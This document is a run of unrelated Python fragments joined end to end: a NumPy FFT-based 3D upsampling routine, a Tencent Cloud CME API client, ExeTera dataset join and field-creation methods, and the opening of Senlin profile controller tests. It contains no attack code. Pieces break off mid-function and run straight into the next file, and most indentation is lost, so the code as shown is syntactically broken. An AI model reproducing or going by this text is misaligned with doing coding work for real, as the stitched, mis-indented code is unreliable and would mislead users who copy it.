J += 0.125*I[i:n1[0]*2:2,j:n1[1]*2:2,k:n1[2]*2:2]
return J
def upsample(I,nup):
'''Upsample by zero padding in the Fourier domain.
Inputs are I, an image to be upsampled
nup, the desired size of the upsampled image.
    Output is the upsampled image.
'''
n = np.array(I.shape)
# now I want to upsample by zero padding in the Fourier domain
even = (1 - (n % 2)).astype(int)
shift = even * n//2 + (1-even) * (n-1)//2
J = np.array(I)
# upsample the 0th axis
if nup[0] > n[0]:
Jhat = np.fft.fft(J, axis=0)
Jhat = np.roll(Jhat,shift[0],axis=0)
if even[0]:
# if even, make nyquist paired
Jhat[0,:,:] /= 2.0
Jhat = np.pad(Jhat,pad_width=((0,1),(0,0),(0,0)),mode='edge')
n[0] = n[0] + 1
# now pad
Jhat = np.pad(Jhat,pad_width=((0,nup[0]-n[0]),(0,0),(0,0)),mode='constant',constant_values=0)
# shift it
Jhat = np.roll(Jhat,-shift[0],axis=0)
J = np.fft.ifft(Jhat,axis=0).real
# upsample the 1th axis
if nup[1] > n[1]:
Jhat = np.fft.fft(J, axis=1)
Jhat = np.roll(Jhat,shift[1],axis=1)
if even[1]:
# if even, make nyquist paired
Jhat[:,0,:] /= 2.0
Jhat = np.pad(Jhat,pad_width=((0,0),(0,1),(0,0)),mode='edge')
n[1] = n[1] + 1
# now pad
Jhat = np.pad(Jhat,pad_width=((0,0),(0,nup[1]-n[1]),(0,0)),mode='constant',constant_values=0)
# shift it
Jhat = np.roll(Jhat,-shift[1],axis=1)
J = np.fft.ifft(Jhat,axis=1).real
# upsample the 2th axis
if nup[2] > n[2]:
Jhat = np.fft.fft(J, axis=2)
Jhat = np.roll(Jhat,shift[2],axis=2)
        if even[2]:
# if even, make nyquist paired
Jhat[:,:,0] /= 2.0
Jhat = np.pad(Jhat,pad_width=((0,0),(0,0),(0,1)),mode='edge')
n[2] = n[2] + 1
# now pad
Jhat = np.pad(Jhat,pad_width=((0,0),(0,0),(0,nup[2]-n[2])),mode='constant',constant_values=0)
# shift it
Jhat = np.roll(Jhat,-shift[2],axis=2)
J = np.fft.ifft(Jhat,axis=2).real
# correct normalization
# note inverse has 1/n
    J = J * np.prod(nup) / np.prod(n)
return J
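The Fourier zero-padding idea can be exercised in 1D with a naive DFT. This sketch handles odd lengths only (even lengths additionally need the Nyquist-splitting step used above) and is a hypothetical illustration, not part of the module:

```python
import cmath

def dft(x):
    n = len(x)
    return [sum(x[k] * cmath.exp(-2j * cmath.pi * f * k / n) for k in range(n))
            for f in range(n)]

def idft(X):
    n = len(X)
    return [sum(X[f] * cmath.exp(2j * cmath.pi * f * k / n) for f in range(n)).real / n
            for k in range(n)]

def upsample_1d(x, nup):
    '''Zero pad the spectrum of an odd-length signal out to length nup.'''
    n = len(x)
    assert n % 2 == 1 and nup >= n
    shift = (n - 1) // 2
    X = dft(x)
    X = X[-shift:] + X[:-shift] if shift else X   # roll negative freqs to the front
    X = X + [0j] * (nup - n)                      # zero pad the high frequencies
    X = X[shift:] + X[:shift]                     # roll back
    # renormalize: the inverse DFT divides by nup instead of n
    return [v * nup / n for v in idft(X)]

# band-limited upsampling leaves a constant signal constant
y = upsample_1d([5.0, 5.0, 5.0], 7)
assert len(y) == 7 and all(abs(v - 5.0) < 1e-9 for v in y)
```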
def transform_data(x0,x1,x2,data,tform0,tform1,tform2,
y0=None,y1=None,y2=None,y=None,
t0=None,t1=None,t2=None,t=None,
**kwargs):
'''
    Transform
# -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.cme.v20191029 import models
class CmeClient(AbstractClient):
_apiVersion = '2019-10-29'
_endpoint = 'cme.tencentcloudapi.com'
_service = 'cme'
def AddTeamMember(self, request):
        """Add a member to a team, specifying the member's role.
:param request: Request instance for AddTeamMember.
:type request: :class:`tencentcloud.cme.v20191029.models.AddTeamMemberRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.AddTeamMemberResponse`
"""
try:
params = request._serialize()
body = self.call("AddTeamMember", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AddTeamMemberResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
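Every method in this client follows the same call-and-parse pattern: serialize the request, call the endpoint, and unwrap a `{"Response": {...}}` envelope that either carries a payload or an `Error` block. A standalone sketch of that envelope handling (with a hypothetical `SDKError` class and model factory, not Tencent's actual types):

```python
import json

class SDKError(Exception):
    '''Hypothetical stand-in for TencentCloudSDKException.'''
    def __init__(self, code, message, request_id=None):
        super().__init__('{}: {}'.format(code, message))
        self.code, self.message, self.request_id = code, message, request_id

def parse_envelope(body, model_factory=dict):
    '''Unwrap the {"Response": {...}} envelope, raising on an Error block.'''
    response = json.loads(body)['Response']
    if 'Error' in response:
        err = response['Error']
        raise SDKError(err['Code'], err['Message'], response.get('RequestId'))
    return model_factory(response)

# success path: the payload is handed to the model factory
ok = parse_envelope('{"Response": {"RequestId": "r1", "TeamId": "t1"}}')
assert ok['TeamId'] == 't1'

# error path: the Error block becomes an exception
try:
    parse_envelope('{"Response": {"Error": {"Code": "AuthFailure", '
                   '"Message": "bad"}, "RequestId": "r2"}}')
except SDKError as e:
    assert e.code == 'AuthFailure' and e.request_id == 'r2'
```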
def CreateClass(self, request):
        """Create a category for organizing materials.
        <li>The category tree cannot be more than 10 levels deep;</li>
        <li>a category cannot have more than 10 subcategories.</li>
:param request: Request instance for CreateClass.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateClassRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateClassResponse`
"""
try:
params = request._serialize()
body = self.call("CreateClass", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateClassResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def CreateLink(self, request):
        """Create a material link or a category path link, linking the source resource information to the target.
:param request: Request instance for CreateLink.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateLinkRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateLinkResponse`
"""
try:
params = request._serialize()
body = self.call("CreateLink", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateLinkResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def CreateProject(self, request):
        """Create a CME editing project. Supports creating video editing, live stream clipping, switcher, and video splitting projects.
:param request: Request instance for CreateProject.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateProjectRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateProjectResponse`
"""
try:
params = request._serialize()
body = self.call("CreateProject", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateProjectResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def CreateTeam(self, request):
        """Create a team.
:param request: Request instance for CreateTeam.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateTeamRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateTeamResponse`
"""
try:
params = request._serialize()
body = self.call("CreateTeam", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateTeamResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DeleteClass(self, request):
        """Delete a category. The following constraints are checked on deletion:
        <li>the category path must exist;</li>
        <li>the category must have no materials bound to it.</li>
:param request: Request instance for DeleteClass.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteClassRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteClassResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteClass", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteClassResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DeleteLoginStatus(self, request):
        """Delete a user's login status, logging the user out of the CME platform.
:param request: Request instance for DeleteLoginStatus.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteLoginStatusRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteLoginStatusResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteLoginStatus", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteLoginStatusResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DeleteMaterial(self, request):
        """Delete a material by its material Id.
:param request: Request instance for DeleteMaterial.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteMaterialRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteMaterialResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteMaterial", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteMaterialResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DeleteProject(self, request):
        """Delete a CME editing project.
:param request: Request instance for DeleteProject.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteProjectRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteProjectResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteProject", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteProjectResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DeleteTeam(self, request):
        """Delete a team.
        <li>The team to be deleted must own no materials;</li>
        <li>the team to be deleted must own no categories.</li>
:param request: Request instance for DeleteTeam.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteTeamRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteTeamResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteTeam", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteTeamResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DeleteTeamMembers(self, request):
        """Remove members from a team. By default, only the Owner and administrators have this permission.
:param request: Request instance for DeleteTeamMembers.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteTeamMembersRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteTeamMembersResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteTeamMembers", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteTeamMembersResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribeClass(self, request):
        """Get all category information under the specified owner.
:param request: Request instance for DescribeClass.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeClassRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeClassResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeClass", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeClassResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribeJoinTeams(self, request):
        """Get the list of teams that the specified team member has joined.
:param request: Request instance for DescribeJoinTeams.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeJoinTeamsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeJoinTeamsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeJoinTeams", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeJoinTeamsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribeLoginStatus(self, request):
        """Query the login status of the specified user.
:param request: Request instance for DescribeLoginStatus.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeLoginStatusRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeLoginStatusResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeLoginStatus", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeLoginStatusResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribeMaterials(self, request):
        """Batch-get material details by material Id.
:param request: Request instance for DescribeMaterials.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeMaterialsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeMaterialsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeMaterials", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeMaterialsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribePlatforms(self, request):
        """<li>Supports listing all created platforms;</li>
        <li>supports listing the specified platforms.</li>
:param request: Request instance for DescribePlatforms.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribePlatformsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribePlatformsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribePlatforms", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribePlatformsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribeProjects(self, request):
        """Filter the project list by multiple conditions.
:param request: Request instance for DescribeProjects.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeProjectsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeProjectsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeProjects", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeProjectsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
def DescribeResourceAuthorization(self, request):
        """Query the authorization list of the specified resource.
:param request: Request instance for DescribeResourceAuthorization.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeResourceAuthorizationRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeResourceAuthorizationResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeResourceAuthorization", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeResourceAuthorizationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
                raise TencentCloudSDKException(type(e).__name__, str(e))
unique_fkey_indices < operations.INVALID_INDEX
safe_unique_fkey_indices = unique_fkey_indices[invalid_filter]
        # the values to join are in the same space as the unique_fkey_indices, which
        # means they may still contain invalid indices, so filter those now
safe_values_to_join = raw_values_to_join[invalid_filter]
# now get the memory that the results will be mapped to
# destination_space_values = writer.chunk_factory(len(destination_pkey))
destination_space_values = np.zeros(len(destination_pkey), dtype=raw_values_to_join.dtype)
# finally, map the results from the source space to the destination space
destination_space_values[safe_unique_fkey_indices] = safe_values_to_join
if writer is not None:
writer.data.write(destination_space_values)
else:
return destination_space_values
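The filter-then-scatter pattern used above (drop rows whose foreign key matched nothing, then write the surviving values into destination order) can be sketched with plain lists. `scatter_join` is a hypothetical helper, with -1 standing in for an invalid index rather than `operations.INVALID_INDEX`:

```python
def scatter_join(values, unique_fkey_indices, dest_len, invalid=-1):
    '''Scatter per-group values into a destination-ordered list, skipping
    entries whose foreign key matched nothing (the sentinel `invalid`).'''
    dest = [0] * dest_len                 # zero-filled destination memory
    for idx, val in zip(unique_fkey_indices, values):
        if idx != invalid:                # mirrors the invalid_filter mask
            dest[idx] = val
    return dest

# three per-group values mapped into a 4-row destination; the second group
# has no destination row, so its value is dropped
assert scatter_join([10, 20, 30], [2, -1, 0], 4) == [30, 0, 10, 0]
```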
def predicate_and_join(self,
predicate, destination_pkey, fkey_indices,
reader=None, writer=None, fkey_index_spans=None):
"""
This method is due for removal and should not be used.
Please use the merge or ordered_merge functions instead.
"""
if reader is not None:
if not isinstance(reader, rw.Reader):
raise ValueError(f"'reader' must be a type of Reader but is {type(reader)}")
if isinstance(reader, rw.IndexedStringReader):
                raise ValueError("Joins on indexed string fields are not supported")
# generate spans for the sorted key indices if not provided
if fkey_index_spans is None:
fkey_index_spans = self.get_spans(field=fkey_indices)
# select the foreign keys from the start of each span to get an ordered list
# of unique id indices in the destination space that the results of the predicate
# execution are mapped to
unique_fkey_indices = fkey_indices[:][fkey_index_spans[:-1]]
# generate a filter to remove invalid foreign key indices (where values in the
        # foreign key don't map to any values in the destination space)
invalid_filter = unique_fkey_indices < operations.INVALID_INDEX
safe_unique_fkey_indices = unique_fkey_indices[invalid_filter]
# execute the predicate (note that not every predicate requires a reader)
if reader is not None:
dtype = reader.dtype()
else:
dtype = np.uint32
results = np.zeros(len(fkey_index_spans) - 1, dtype=dtype)
predicate(fkey_index_spans, reader, results)
# the predicate results are in the same space as the unique_fkey_indices, which
# means they may still contain invalid indices, so filter those now
safe_results = results[invalid_filter]
# now get the memory that the results will be mapped to
destination_space_values = writer.chunk_factory(len(destination_pkey))
# finally, map the results from the source space to the destination space
destination_space_values[safe_unique_fkey_indices] = safe_results
writer.write(destination_space_values)
def get(self,
field: Union[Field, h5py.Group]):
"""
Get a Field from a h5py Group.
Example::
# this code for context
with Session() as s:
# open a dataset about wildlife
src = s.open_dataset("/my/wildlife/dataset.hdf5", "r", "src")
# fetch the group containing bird data
birds = src['birds']
# get the bird decibel field
bird_decibels = s.get(birds['decibels'])
:param field: The Field or Group object to retrieve.
"""
if isinstance(field, Field):
return field
if 'fieldtype' not in field.attrs.keys():
raise ValueError(f"'{field}' is not a well-formed field")
fieldtype_map = {
'indexedstring': fld.IndexedStringField,
'fixedstring': fld.FixedStringField,
'categorical': fld.CategoricalField,
'boolean': fld.NumericField,
'numeric': fld.NumericField,
'datetime': fld.TimestampField,
'date': fld.TimestampField,
'timestamp': fld.TimestampField
}
fieldtype = field.attrs['fieldtype'].split(',')[0]
return fieldtype_map[fieldtype](self, field, None, field.name)
def create_like(self, field, dest_group, dest_name, timestamp=None, chunksize=None):
"""
Create a field of the same type as an existing field, in the location and with the name provided.
Example::
with Session as s:
...
a = s.get(table_1['a'])
b = s.create_like(a, table_2, 'a_times_2')
b.data.write(a.data[:] * 2)
:param field: The Field whose type is to be copied
:param dest_group: The group in which the new field should be created
:param dest_name: The name of the new field
"""
if isinstance(field, h5py.Group):
if 'fieldtype' not in field.attrs.keys():
raise ValueError("{} is not a well-formed field".format(field))
f = self.get(field)
return f.create_like(dest_group, dest_name)
elif isinstance(field, Field):
return field.create_like(dest_group, dest_name)
else:
raise ValueError("'field' must be either a Field or a h5py.Group, but is {}".format(type(field)))
def create_indexed_string(self, group, name, timestamp=None, chunksize=None):
"""
Create an indexed string field in the given DataFrame with the given name.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param timestamp: If set, the timestamp that should be given to the new field. If not set
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
                raise ValueError("'group' must be an ExeTera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.indexed_string_field_constructor(self, group, name, timestamp, chunksize)
return fld.IndexedStringField(self, group[name], None, write_enabled=True)
else:
return group.create_indexed_string(name, timestamp, chunksize)
def create_fixed_string(self, group, name, length, timestamp=None, chunksize=None):
"""
Create a fixed string field in the given DataFrame, given name, and given max string length per entry.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param length: The maximum length in bytes that each entry can have.
:param timestamp: If set, the timestamp that should be given to the new field. If not set
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
raise ValueError("'group' must be an ExeTera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.fixed_string_field_constructor(self, group, name, length, timestamp, chunksize)
return fld.FixedStringField(self, group[name], None, write_enabled=True)
else:
return group.create_fixed_string(name, length, timestamp, chunksize)
def create_categorical(self, group, name, nformat, key, timestamp=None, chunksize=None):
"""
Create a categorical field in the given DataFrame with the given name. This function also takes a numerical
format for the numeric representation of the categories, and a key that maps numeric values to their
string descriptions.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param nformat: A numerical type in the set (int8, uint8, int16, uint16, int32, uint32, int64). It is
recommended to use 'int8'.
:param key: A dictionary that maps numerical values to their string representations
:param timestamp: If set, the timestamp that should be given to the new field. If not set,
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
raise ValueError("'group' must be an ExeTera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.categorical_field_constructor(self, group, name, nformat, key, timestamp, chunksize)
return fld.CategoricalField(self, group[name], None, write_enabled=True)
else:
return group.create_categorical(name, nformat, key, timestamp, chunksize)
def create_numeric(self, group, name, nformat, timestamp=None, chunksize=None):
"""
Create a numeric field in the given DataFrame with the given name.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param nformat: A numerical type in the set (int8, uint8, int16, uint16, int32, uint32, int64, uint64,
float32, float64). It is recommended to avoid uint64 as certain operations in numpy cause conversions to
floating point values.
:param timestamp: If set, the timestamp that should be given to the new field. If not set,
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
raise ValueError("'group' must be an ExeTera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.numeric_field_constructor(self, group, name, nformat, timestamp, chunksize)
return fld.NumericField(self, group[name], None, write_enabled=True)
else:
return group.create_numeric(name, nformat, timestamp, chunksize)
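The four `create_*` methods above share the same validation-and-dispatch shape: reject a top-level Dataset with a specific error, reject anything that is neither a DataFrame nor an h5py.Group, then either construct the field directly or delegate to the DataFrame. A minimal standalone sketch of that pattern (the classes here are hypothetical stand-ins, not the real ExeTera API):

```python
# Hypothetical stand-ins for ExeTera's Dataset/DataFrame; only the
# validation-and-dispatch shape mirrors the methods above.
class Dataset:
    pass

class DataFrame:
    def create_numeric(self, name, nformat):
        return ("created", name, nformat)

def create_numeric(group, name, nformat):
    if not isinstance(group, DataFrame):
        if isinstance(group, Dataset):
            raise ValueError("'group' must be an ExeTera DataFrame rather than a"
                             " top-level Dataset")
        raise ValueError("'group' must be an ExeTera DataFrame but a "
                         "{} was passed to it".format(type(group)))
    # delegate to the DataFrame, which owns field construction
    return group.create_numeric(name, nformat)
```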
def create_timestamp(self, group, name, timestamp=None, chunksize=None):
"""
Create a timestamp field in the given group with the given name.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if | |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from webob import exc
from oslo_serialization import jsonutils
from oslo_utils import uuidutils
from senlin.api.common import util
from senlin.api.middleware import fault
from senlin.api.openstack.v1 import profiles
from senlin.common import exception as senlin_exc
from senlin.common import policy
from senlin.rpc import client as rpc_client
from senlin.tests.unit.api import shared
from senlin.tests.unit.common import base
@mock.patch.object(policy, 'enforce')
class ProfileControllerTest(shared.ControllerTest, base.SenlinTestCase):
def setUp(self):
super(ProfileControllerTest, self).setUp()
class DummyConfig(object):
bind_port = 8778
cfgopts = DummyConfig()
self.controller = profiles.ProfileController(options=cfgopts)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_normal(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
req = self._get('/profiles')
engine_resp = [
{
u'id': u'aaaa-bbbb-cccc',
u'name': u'profile-1',
u'type': u'test_profile_type',
u'spec': {
u'param_1': u'value1',
u'param_2': u'value2',
},
u'created_time': u'2015-02-24T19:17:22Z',
u'updated_time': None,
u'metadata': {},
}
]
mock_call.return_value = engine_resp
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.index(req)
self.assertEqual(engine_resp, result['profiles'])
mock_parse.assert_called_once_with(
'ProfileListRequest', req, {'project_safe': True})
mock_call.assert_called_once_with(req.context, 'profile_list', obj)
@mock.patch.object(util, 'parse_request')
@mock.patch.object(rpc_client.EngineClient, 'call')
def test_profile_index_whitelists_params(self, mock_call, mock_parse,
mock_enforce):
self._mock_enforce_setup(mock_enforce, 'index', True)
marker_uuid = uuidutils.generate_uuid()
params = {
'name': 'foo',
'type': 'fake_type',
'limit': 20,
'marker': marker_uuid,
'sort': 'name:asc',
'global_project': False
}
req = self._get('/profiles', params=params)
mock_call.return_value = []
obj = mock.Mock()
mock_parse.return_value = obj
result = self.controller.index(req)
self.assertEqual([], result['profiles'])
mock_parse.assert_called_once_with(
